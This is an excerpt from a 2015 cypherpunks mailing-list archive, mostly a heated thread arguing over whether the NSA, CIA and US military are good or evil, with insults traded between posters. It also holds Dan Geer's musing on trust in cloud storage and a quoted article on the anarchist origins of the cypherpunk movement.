seen until now, looks like people might consider hopping onto it to divest somewhat from Google / facebook business models. On 07/21/2015 07:14 AM, Seth wrote: > On Sat, 18 Jul 2015 14:09:21 -0700, rysiek > wrote: >> Run your own servers, control your own infrastructure. There are >> ways to do it. Next on my "ToTest" list is this, for instance: >> https://github.com/sovereign/sovereign > > Funny you mention the Sovereign project, I stumbled upon it myself > for the first time last week. 
> > I had already been in the process of building my own version of > essentially the same thing, only geared more towards Parabola > GNU/Linux and Open/FreeBSD. > > Another interesting project for wresting back control of your data > and services is indiehosters [1][2] > > Probably a better option for those without copious amounts of free > time and the technical skills and desire to implement a DIY > solution. > > [1] http://www.wired.com/2014/11/indie-hosters/ [2] > https://indiehosters.net/ > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From nickeconopouly at gmail.com Tue Jul 21 06:53:11 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Tue, 21 Jul 2015 09:53:11 -0400 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <20150721135311.GA9266@android> On 07/21, Juan wrote: > > > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. 
> > It has people who say that the NSA does good things (coderman) It is child's thinking to think that the NSA only does bad things. You can think of the Govt. as fundamentally bad or evil or whatever but it simply isn't logical for it to never, say, thwart a legitimate attack (no "t" word, you're welcome) that it didn't cause. The propaganda you mention wouldn't work if people, including those working for the govt., thought that the govt. wasn't working to solve the problem. The govt HAS to do good things to retain its legitimacy in enough of its peoples' eyes. The US government does not keep its power over its citizens with just brute force and propaganda. It is a complex social relationship, and yes a great deal of propaganda is involved. But it is not totalitarian the way you frame it. It is not like a children's movie where the villains are all ugly and you can tell they are villains just from the way they look and talk. The policeman, the marine dude, and even the politician or CIA official came from some family and applied for the job because it was considered an acceptable way to make a living and contribute to society. They are not all evil. It doesn't matter if the nasty recipe of them all mixed together makes the USA cause/commit atrocities, it's simplistic and basically false to act like every one of these USians is evil. By killing these kinds of discussions with your delusional, short-man-syndrome arguments, you are contributing to the problem. Think of the disgruntled senator or NSA worker who is reading this list, and finds they agree with our stuff. Now, instead of being fascinated by some of the other posts that were actually about cryptography, like decentralized social nets, etc, they are clicking away because of your trolling. Actually, to be honest, you are serving the NSA more than anyone on this list, even the "spies". When it has been deserted because it resembles the comments section of a youtube video, they will have you to thank. 
Also, you guys really think there is an NSA-man personally reading this list, looking for dissidents? Why would they waste their time on this shit? The only ones subverting it are the most hardcore cypherpunks here, who act like pretty much every free cryptography program is US propaganda somehow. If juan is an agent, he is doing his job very well. Many people in the govt. think they are doing good, and to be honest a good deal of them are. This coming from someone who thinks healthy society could exist without a government. Citizens think the government is on their side too, and it's not that they are simply brainwashed. There are no mandatory television hours where you have to watch govt propaganda, the two main sources of it are in the msm (TV), and at school while the child grows up. It isn't north korea, or 1984. The citizens don't feel forced, most of them, and it's because the government has this habit of NOT being an evil, creepy death cult most of the time. The bad stuff happens away from the public view including the stuff y'all have mentioned like the CIA mercenary armies and fiddling with regimes after WWII. > > It has apologists of the US marines. > > It has high ranking scumbags from the CIA. > > It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. False. I wouldn't have interjected because then I am contributing to the problems of this mailing list, but don't keep telling fabrications about me please. Literally every statement in that sentence is a lie about me. Not cool. > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. It's amusing how Juan picked up the "apologist" term from my emails and is now using it incorrectly. 
-nick From softservant at gmail.com Tue Jul 21 13:05:40 2015 From: softservant at gmail.com (Softy) Date: Tue, 21 Jul 2015 13:05:40 -0700 Subject: Re: an ominous comment Message-ID: And, let's not forget that as DARPA funded Google then too did Google and NASA fund Singularity Univ. So, perhaps you say Google and the IC/DoD are world dominators. Perhaps these machinations of the elite are to usher in a super human intelligence (hopefully controlled by DoD) for their own service. From loki at obscura.com Tue Jul 21 13:54:25 2015 From: loki at obscura.com (Lance Cottrell) Date: Tue, 21 Jul 2015 13:54:25 -0700 Subject: an ominous comment In-Reply-To: <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> Message-ID: <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> I recall it being more nuanced and diverse. 
-- Lance Cottrell Sent from my iPad > On Jul 21, 2015, at 11:51 AM, Juan wrote: > > On Tue, 21 Jul 2015 06:58:52 -0700 > Seth wrote: > >> Correct me if I'm wrong, but aren't the roots of the Cypherpunk >> movement more or less explicitly anarchist? > > this ^^^^^ > >> >> The number of state-theists on this list never ceases to amaze. > > and this ^^^^^ From dan at geer.org Tue Jul 21 11:01:05 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 21 Jul 2015 14:01:05 -0400 Subject: an ominous comment In-Reply-To: Your message of "Mon, 20 Jul 2015 09:36:05 +0200." <55ACA4E5.5010807@artdecode.de> Message-ID: <20150721180105.491862280EA@palinka.tinho.net> Continuing to think about this, an analogy presents itself. If I tell you a secret after getting your agreement that you will not yourself tell anyone else, then I am trusting in non-recursive disclosure, i.e., you break the chain and I trust that you will not fail to do so. If I place my execution or my storage in the hands of others, then I am trusting in non-recursive propagation of my code and/or my data. If the pinnacle goal of security engineering is "No silent failure," then creating a dependence on non-recursive exposure of execution or storage is resolved either by blind trust or by a sufficient degree of surveillability that prevents silent breaking of the non-recursion constraint. But what would that be? Is this a kind of supply chain argument that devolves to whether a target is or is not big enough to sue? If I have proven, workable recourse, then perhaps I can trust -- which is to say I am able to then choose to take no additional, proactive countermeasures. If I do not have proven, workable recourse, then how can I prevent not just silent failure but silent failure plus a clean getaway even post-discovery? 
Daniel Solove suggested that the greatest danger to privacy is a blithe "I live a good life and have nothing to hide;" so, in parallel, is not the greatest danger to data integrity something of a parallel construction, something like "No one would want to screw with my cloud, I'm just a nobody"? Thinking out loud; no need to answer, --dan From sdw at lig.net Tue Jul 21 15:14:49 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 15:14:49 -0700 Subject: an ominous comment In-Reply-To: <20150721180105.491862280EA@palinka.tinho.net> References: <20150721180105.491862280EA@palinka.tinho.net> Message-ID: <55AEC459.8000600@lig.net> On 7/21/15 11:01 AM, dan at geer.org wrote: > Continuing to think about this, an analogy presents itself. > If I tell you a secret after getting your agreement that you > will not yourself tell anyone else, then I am trusting in > non-recursive disclosure, i.e., you break the chain and I > trust that you will not fail to do so. > > If I place my execution or my storage in the hands of > others, then I am trusting in non-recursive propagation of > my code and/or my data. If the pinnacle goal of security > engineering is "No silent failure," then creating a > dependence on non-recursive exposure of execution or storage > is resolved either by blind trust or by a sufficient degree > of surveillability that prevents silent breaking of the > non-recursion constraint. But what would that be? Is this > a kind of supply chain argument that devolves to whether a > target is or is not big enough to sue? If I have proven, > workable recourse, then perhaps I can trust -- which is to > say I am able to then choose to take no additional, > proactive countermeasures. If I do not have proven, > workable recourse, then how can I prevent not just silent > failure but silent failure plus a clean getaway even > post-discovery? 
> > Daniel Solove suggested that the greatest danger to privacy > is a blithe "I live a good life and have nothing to hide;" > so, in parallel, is not the greatest danger to data > integrity something of a parallel construction, something > like "No one would want to screw with my cloud, I'm just a > nobody"? > > Thinking out loud; no need to answer, > > --dan +1 There are multiple avenues possible of assurance, architecture, audit, obfuscation, canaries, etc. Perhaps encrypted computing will be useful; already encrypted storage is relatively easy to use for at least some circumstances (object stores, backup). If billions of lightweight container-based compute transactions are flowing through a system that pools payment and has secure distributed storage and communication, is it possible to be too obscure to identify and tap? Spammer scammers are practicing this kind of thing daily, and countermeasures are being created too, but as for most of that there is a final traceable step, email etc., that's not quite the same as some other private security goals. sdw From coderman at gmail.com Tue Jul 21 15:22:58 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 15:22:58 -0700 Subject: an ominous comment - duality of earth human existence Message-ID: On 7/20/15, Stephen D. Williams wrote: >> >> It has people who say that the NSA does good things (coderman) > > They don't? defensive mission vs. offensive like the duality of existence, good and bad, bad and good; polemic extremes always. gotta learn offensive to know how to defend. then defender uses to advance attacks? we're fighting this front in many contexts. all the easy lines are drawn, and the problems left hard to impossible. --- i don't know if you have good or bad intentions, Juan. 
but i hope you know what i like about NSA is their defensive support, and i miss the days when they weren't raving drunk with offensive addiction pointed domestically... [ and funny enough, their offensive addiction led to leaks which led to mass adoption of crypto in ways i never imagined could happen. so might even say a BAD NSA is good for privacy. ] --- best regards and intentions, even to Juan ;P From juan.g71 at gmail.com Tue Jul 21 11:51:45 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 15:51:45 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> On Tue, 21 Jul 2015 06:58:52 -0700 Seth wrote: > Correct me if I'm wrong, but aren't the roots of the Cypherpunk > movement more or less explicitly anarchist? this ^^^^^ > > The number of state-theists on this list never ceases to amaze. and this ^^^^^ From sdw at lig.net Tue Jul 21 16:30:44 2015 From: sdw at lig.net (Stephen D. 
Williams) Date: Tue, 21 Jul 2015 16:30:44 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55AED624.4090208@lig.net> This is farcical, but one more round lest silence be taken as tacit agreement. For those of you who can't efficiently process unwanted email, apologies. And consider getting a better email client + plugins. On 7/21/15 2:03 AM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. Williams wrote: >> On 7/20/15 10:32 PM, Juan wrote: >>> On Mon, 20 Jul 2015 21:36:57 -0700 >>> "Stephen D. Williams" wrote: >>> >>>> On 7/20/15 9:07 PM, Juan wrote: >>>>> Hey. *Now* I get it. >>>>> >>>>> This mailing list has a lot of tor-tards who are apologists >>>>> of the pentagon's propaganda and spying efforts. >>>> Are you saying that the Pentagon is never good or useful? Nor are >>>> any of their spying efforts? >>> Are you saying the pentagon is good and useful? >> The Pentagon et al are protecting a large portion of the world from being >> overrun. Nobody else will do it. > Damn! From Russia and China yeah? Wow. What a mindset. Not really, more from warlords, dictators, etc. Supposedly Russia is "only protecting their ethnic Russians". From what? Joining NATO and Western Europe as far as I could tell. > https://en.wikipedia.org/wiki/Covert_United_States_foreign_regime_change_actions > > "The United States has been involved in and assisted in the overthrow > of foreign governments (more recently termed "regime change") without > the overt use of U.S. military force. Often, such operations are > tasked to the Central Intelligence Agency (CIA)." 
Yep, the US has been involved in all kinds of past situations, along with a number of other countries. Those were indeed the bad old days. Sometimes intentions were good, sometimes maybe not. It's too bad that people 40-80 years ago didn't have 2015 sensibilities. Romans begat Europe, British begat a lot, including terrible treatment of Aborigines and Maori. Europe decimated American Indians. Slavery. But you imply that past possibly-poor actions indicate present value. Hardly. None of those people are in power and most are dead. Everyone has learned a lot, J. Edgar Hoover is no longer blackmailing US Presidents and everyone else to preserve his FBI empire, etc. Americans beat up on America quite a bit and all of this eventually comes out, often these days as very watchable movies that authoritatively teach what we weren't taught in school, about the US and often the rest of the world. Generally, lessons are learned and we do better in the future. But occasionally someone slips in who is not an intellectual powerhouse and mistakes are made again. C'est la vie. What's your better alternative? Even when the US meddled, except for a very few circumstances, it was to achieve something useful, not to subjugate peoples for colonies, incorporation into an empire, etc. The US pays a lot for legacy military bases everywhere, provides lots of protection and other benefits, and generally attempts to fit in and be respectful. > > I grant they seem to be doing ... something. Here's the table of > contents from that wiki page: > > Contents > 1 Cold War > 1.1 Syria 1949 > ... 2.3 Iran 2005–present > > Perhaps those are the countries that were going to overrun "us" (never > mind the fact I live in Australia anyway, but damn, what a way of > thinking). What is your concept? That no one have power to repel anyone else? That some other country / culture is better suited to being "on top"? The US is the worst system, except for everything else. 
It is deliberately designed to be messy, in conflict, and unstable. The genius of this arrangement is that it leads to a stronger result than anything else. > SDW, thank you for being so frank - honest about how you think. It is > educational to me in a good way. Part of the difference is perhaps > that I am not living in the USA, so I look inwards to your government > and agencies, not outwards. Many non-Americans don't really get America, even if they have visited or lived here. Many Americans don't fully get America either; easy to be parochial. Not long ago, someone was tearing into the US about teargas being used in some situation, how terrible and dangerous it was, etc. I pointed out, with references, that every single American military individual is subjected to a good dose of teargas as part of training. >>>> when they don't determine their goals or rules of >>>> engagement? Their job is to be a bad ass tool, the proverbial big >>>> stick. It is someone else's job to decide how to use that tool. >>>> Marines don't kill people, politicians using Marines kill people. >>>> Err, something like that. >>> Marines and other 'military personnel' murder people when >>> 'ordered' to. They are the worst scumbags on earth. >>> >>> Politicians are morally responsible. The military are morally >>> and materially responsible. >> Are police always bad too? >> >>> ... >>> Is everyone from the CIA scumbags by definition? >>> Yes. >> Whatever you gotta believe. >> Most of their job is to understand the world, > :) > > Interesting way of "understanding" the world - 'regime change' is > about as polite a way the current empire can couch its predominant > activity since WWII. In some cases, regime change can be nice. Depends on specifics. ... >>>> I would even say that a lot of government employees and >>>> contractors seem to have got away with a lot of things they shouldn't >>>> have. 
But that doesn't mean that any of those organizations are >>>> fundamentally evil and aren't almost completely staffed by >>>> intelligent, respectable people. >>> >>> LOL. So, how much trolling should I let you get away with? >>> >>> Worthless murdering scumbags are 'respectable' people and not >>> 'fundamentally evil'. Sure. Maybe they are 'accidentally' >>> evil? >> DOJ, Treasury, State, HHS, etc. are filled with worthless murdering >> scumbags? > Time to wake up. You evidently need to do more research. The balance > of good vs. evil, of the once mighty USA, is well and truly tipped in > favour of despotism and cronyism at this point in history. Very > unfortunately. And notwithstanding the good remnant who do remain > actually within the system (as insignificant and ineffective as they > are to effecting good into the world). Yea? Interesting. I think you've been watching Fox News too much. Or you are talking about New Jersey. ;-) We obsess about that stuff precisely because it isn't tolerated at all, except for narrowly acceptable, mostly noise levels. How do you come to think this? What's your evidence? > > Greece. Rome. Persia. British Empire. USA. > > Every empire falls. USA has fallen, it just can't quite see the > reality of this yet. Yea? What would constitute a fall for the US? I don't think you understand the nature of the US or what would constitute a win. >> There are certain people, Marines et al, who are trained to be very lethal. >> Sucks to need that, but being anything less than the >> strongest & baddest isn't an option for the US. They are concentrated, >> supposed to be carefully deployed and directed. Create >> people like that from the subset of people who want to be like that and a >> few are going to go off the rails occasionally. That's a >> bummer, and needs to be constantly protected against, but there's no obvious >> alternative. >> >> The US is the least imperialist top superpower that ever existed. 
Still not >> perfect, but better than all the rest. > "No better than all the rest". Fixed that for you. Few would agree with that. > > The record is abysmal. USA is "morally" (on an international political > and death-toll level) and financially bankrupt. Depends on what you look at. There are some things that we as a group definitely think were mistakes, Iraq etc. > I just pray that the end of USA's grab for global hegemony means a > long lasting multi-polar world, and not a new imperialist Chinese > "empire regime". What do you think the "success" of a USA grab for global hegemony would look like? What do you think the USA end goal is if it wasn't "stopped"? >>> How about they 'accidentally' beat you to a pulp and then feed >>> you to the pigs? Just as an innocent mistake of course... >> Oh kay. Are you off your meds? > You're missing the point. "Regime change" means if you're in their > way, your life ends. Time for you to do some history lessons. Because > you feel safe (you're one of the "good guys" right?), you don't see > the problem, and you therefore have difficulty hearing the message. Your construction there seems off, but: Much of aggression has been about answering threats, directly or indirectly. So your statement doesn't apply to Afghanistan, WWII, etc. Korea, Vietnam, etc. were about a perceived threat that seemed real; we generally consider those to probably have been wrong on multiple levels. I guess you think that if anyone supports the US, they must be agreeing with everything that's ever happened. Obviously that's a terribly simplistic assumption. > > >>>> Anyway, if you're still in the rebelling against authority stage, >>>> fine, have fun. Good luck with that. In the US, government wise, >>>> the people are the authority >>> Really? That's an interesting concept. How many lsd doses do >>> you need in order to reach the parallel universe where that >>> is reality? Because in this universe, it isn't. 
>> You haven't been watching long or closely enough. Things have changed >> a lot in the US in my lifetime, and it's only speeding up. > Sadly, individual liberty was not respected enough to capture the > sanction of foreign thinkers. I'm being extraordinarily conservative > in my words here... "Capture the sanction of foreign thinkers"? Nonsense. sdw From juan.g71 at gmail.com Tue Jul 21 12:35:24 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 16:35:24 -0300 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: <55ae9eae.421c8c0a.8618e.ffffa112@mx.google.com> On Tue, 21 Jul 2015 09:53:11 -0400 Nick Econopouly wrote: > It's amusing how Juan picked up the "apologist" term from my emails > and is now using it incorrectly. > https://cpunks.org/pipermail/cypherpunks/2014-December/006241.html "To the people who say that governments are not 'monolithic', something that entry-level tor apologists and the like mindlessly parrot. " I'm sorry Nick if I stole your word and infringed upon your intellectual property rights. I profusely apologize. Please don't tell the FBI. Except...do you mind providing proof of your previous ownership of the term? Since I 'picked' it from you (you say), you surely can link messages previous to december 2014 in which you used it, right? I'll be waiting. J. 
> -nick From juan.g71 at gmail.com Tue Jul 21 13:06:02 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 17:06:02 -0300 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> On Tue, 21 Jul 2015 09:53:11 -0400 Nick Econopouly wrote: > The US government does not keep its power over its citizens with > just brute force and propaganda. It is a complex social relationship, > and yes a great deal of propaganda is involved. But it is not > totalitarian the way you frame it. Sure. It's not totalitarian. It's simply based on the free principle of democracy : obey or die. You don't need to waste your amazing intellect refuting me, Nick. I've conceded your point. > It is not like a children's movie > where the villains are all ugly and you can tell they are villains > just from the way they look and talk. The policeman, the marine dude, > and even the politician or CIA official came from some family and > applied for the job because it was considered an acceptable way to > make a living and contribute to society. They are not all evil. It > doesn't matter if the nasty recipe of them all mixed together makes > the USA cause/commit atrocities, it's simplistic and basically false > to act like every one of these USians is evil. Thanks Nick. Now I really get it. People who do evil things are not evil. They are good. 1) > Think of the disgruntled senator or NSA worker who is reading this > list, 2) > Actually, to be honest, you are serving the NSA more than anyone on > this list, even the "spies". 
3) > Also, you guys really think there is an NSA-man personally > reading this list, looking for dissidents? Why would they waste their > time on this shit? See Nick, that's the real extent of your intellect. It took you two paragraphs to flatly contradict yourself. > The only ones subverting it are the most hardcore > cypherpunks here, Well, thanks for considering me a hardcore cypherpunk? Now think about what you wrote. You're whining about cypherpunks in a cypherpunk mailing list. Do you see just how ridiculous you are? But I get it. What you want is a cypherpunk mailing list full of obama supporters - like you. Did I get that one right? > who act like pretty much every free cryptography > program is US propaganda somehow. If juan is an agent, he is doing his > job very well. Thanks. > > Many people in the govt. think they are doing good, and to be honest a > good deal of them are. Humor me. What word do you use to describe your political beliefs? > This coming from someone who thinks healthy > society could exist without a government. Oh OK. You are a fucking nutcase who fancies himself an anarchist while he praises the US government. I rest my case. > > Citizens think the government is on their side too, and it's not that > they are simply brainwashed. There are no mandatory television hours > where you have to watch govt propaganda, the two main sources of it > are in the msm (TV), and at school while the child grows up. It isn't > north korea, or 1984. The citizens > don't feel forced, most of them, and it's because the government has > this habit of NOT being an evil, creepy death cult most of the time. > The bad stuff happens away from the public view including the stuff > y'all have mentioned like the CIA mercenary armies and fiddling with > regimes after WWII. > > > > It has apologists of the US marines. > > > > It has high ranking scumbags from the CIA. 
> > > > It has commie 'anarchists' who are offended by (and would > > love to silence) people who badmouth the marines' apologists. > False. I wouldn't have interjected because then I am contributing to > the problems of this mailing list, but don't keep telling > fabrications about me please. > > Literally every statement in that sentence is a lie about me. Not > cool. > > > > And NOW it also has a google and cloud apologist. Welcome > > Stephen =) You are yet another reason to distrust the FLOSS > > movement and its bloatware. > > It's amusing how Juan picked up the "apologist" term from my emails > and is now using it incorrectly. > > -nick From coderman at gmail.com Tue Jul 21 19:01:29 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 19:01:29 -0700 Subject: an ominous comment In-Reply-To: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> References: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> Message-ID: On 7/21/15, Juan wrote: > ... > Thanks coderman. I was slightly annoyed thinking I might have > to search the archives to back my claim but you've fully > embarrassed yourself (yet again). Appreciated. you should see me in person! my email game is just warm up... you'll need to search the SELinux lists btw, not this one :) > Of course. If I were murdering people left and right, or > committing any of the endless list of crimes your government > commits, then you'd be quite sure that I have GOOD intentions. actually i was thinking of code you've written for common good, but really, any evidence would be useful. until then, the jury's out... some of these discourses are thought provoking, others dumb provoking, and yet more are just TL;DR. ;) > But, since I'm not buying any of your stupid propaganda, you're > not sure if I'm an outright terrist...or somebody sitting at a > desk near you, right? someone i admire is a FOIA terrorist. good friends are "privacy extremists", and some shady fucks have sat next to me in the past. 
i'm not sure what to do with this metric you're using... > Ah yes. You are right. The real problem with the NSA and the US > gov't in general is that 'now' they allegedly started spying on > AMERICUNTS! no, my point about domestic surveillance is that any shred of restraint they may have had, is now evaporated. bulk spying is always bad, but done domestic you've gone rogue! so Juan, how to fix? From coderman at gmail.com Tue Jul 21 19:13:30 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 19:13:30 -0700 Subject: an ominous comment In-Reply-To: <20150722014050.GA11545@android> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> <20150722014050.GA11545@android> Message-ID: On 7/21/15, Nick Econopouly wrote: > ... > I guess it's too much for someone to openly say they aren't 100% sure > how to solve the worlds problems or if we can, and doesn't want to > affiliate with any specific "ism" prison. this is why making better earth humans is always a win, and avoiding tribal behavior like politics and religion useful. i don't know how to fix the world's problems. i do know we need to better educate everyone. i do know we need to stop thinking in Me vs. You. thanks for adding to the signal, Nick! best regards, From coderman at gmail.com Tue Jul 21 20:28:55 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 20:28:55 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... Message-ID: https://cryptome.org/ is even EV special! :P also gets decent B grade on https://www.ssllabs.com/ssltest/analyze.html?d=cryptome.org&latest [ expected for a hosting provider, but always good to check... 
] best regards, From list at sysfu.com Tue Jul 21 20:49:31 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 20:49:31 -0700 Subject: an ominous comment In-Reply-To: <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: On Tue, 21 Jul 2015 13:54:25 -0700, Lance Cottrell wrote: > I recall it being more nuanced and diverse. I wasn't there in the beginning so I don't have any firsthand knowledge. According to this piece, [1] "Almost all cypherpunks were anarchists who regarded the state as the enemy." I'm basing the claim on the fact that founding member Timothy May wasn't exactly shy about his crypto *anarchy* vision of the future. Not sure what exactly what Eric Hughes or John Gilmore's were at the time. [1] http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html The cypherpunks emerged from a meeting of minds in late 1992 in the Bay Area of San Francisco. Its founders were Eric Hughes, a brilliant Berkeley mathematician; Timothy C. May, an already wealthy, former chief scientist at Intel who had retired at the age of thirty-four; and John Gilmore, another already retired and wealthy computer scientist – once number five at Sun Microsystems – who had co-founded an organisation to advance the cause of cyberspace freedom, the Electronic Frontier Foundation. They created a small group, which met monthly in Gilmore’s office at a business he had created, Cygnus. 
At one of the early meetings of the group, an editor at Mondo 2000, Jude Milhon, jokingly called them cypherpunks, a play on cyberpunk, the “hi-tech, low-life” science-fiction genre. The name stuck. It soon referred to a vibrant emailing list, created shortly after the first meeting, which had grown to 700 by 1994 and perhaps 2000 by 1997 with by then up to a hundred postings per day. It also referred to a distinctive sub-culture – eventually there were cypherpunk novels, Snowcrash, Cryptonomicon, Indecent Communications; a cypherpunk porno film, Cryptic Seduction; and even a distinctive cypherpunk dress: broad-brimmed black hats. Most importantly, however, it referred to a political–ideological crusade. At the core of the cypherpunk philosophy was the belief that the great question of politics in the age of the internet was whether the state would strangle individual freedom and privacy through its capacity for electronic surveillance or whether autonomous individuals would eventually undermine and even destroy the state through their deployment of electronic weapons newly at hand. Many cypherpunks were optimistic that in the battle for the future of humankind – between the State and the Individual – the individual would ultimately triumph. Their optimism was based on developments in intellectual history and computer software: the invention in the mid-1970s of public-key cryptography by Whitfield Diffie and Martin Hellman, and the creation by Phil Zimmerman in the early 1990s of a program known as PGP, “Pretty Good Privacy”. The seminal historian of codes, David Kahn, argued that the Diffie–Hellman invention represented the most important development in cryptography since the Renaissance. Zimmerman’s PGP program democratised their invention and provided individuals, free of cost, with access to public-key cryptography and thus the capacity to communicate with others in near-perfect privacy. 
Although George Orwell’s Nineteen Eighty-Four was one of the cypherpunks’ foundational texts, because of the combination of public-key cryptography and PGP software, they tended to believe that in the coming battle between Big Brother and Winston Smith, the victor might be Winston Smith. At the time the cypherpunks formed, the American government strongly opposed the free circulation of public-key cryptography. It feared that making it available would strengthen the hands of the espionage agencies of America’s enemies abroad and of terrorists, organised criminals, drug dealers and pornographers at home. For the cypherpunks, the question of whether cryptography would be freely available would determine the outcome of the great battle of the age. Their most important practical task was to write software that would expand the opportunities for anonymous communication made possible by public-key cryptography. One of the key projects of the cypherpunks was “remailers”, software systems that made it impossible for governments to trace the passage from sender to receiver of encrypted email traffic. Another key project was “digital cash”, a means of disguising financial transactions from the state. Almost all cypherpunks were anarchists who regarded the state as the enemy. Most but not all were anarchists of the Right, or in American parlance, libertarians, who supported laissez-faire capitalism. The most authoritative political voice among the majority libertarian cypherpunks was Tim May, who, in 1994, composed a vast, truly remarkable document, “Cyphernomicon”. May called his system crypto-anarchy. He regarded crypto-anarchy as the most original contribution to political ideology of contemporary times. May thought the state to be the source of evil in history. He envisaged the future as an Ayn Rand utopia of autonomous individuals dealing with each other as they pleased. 
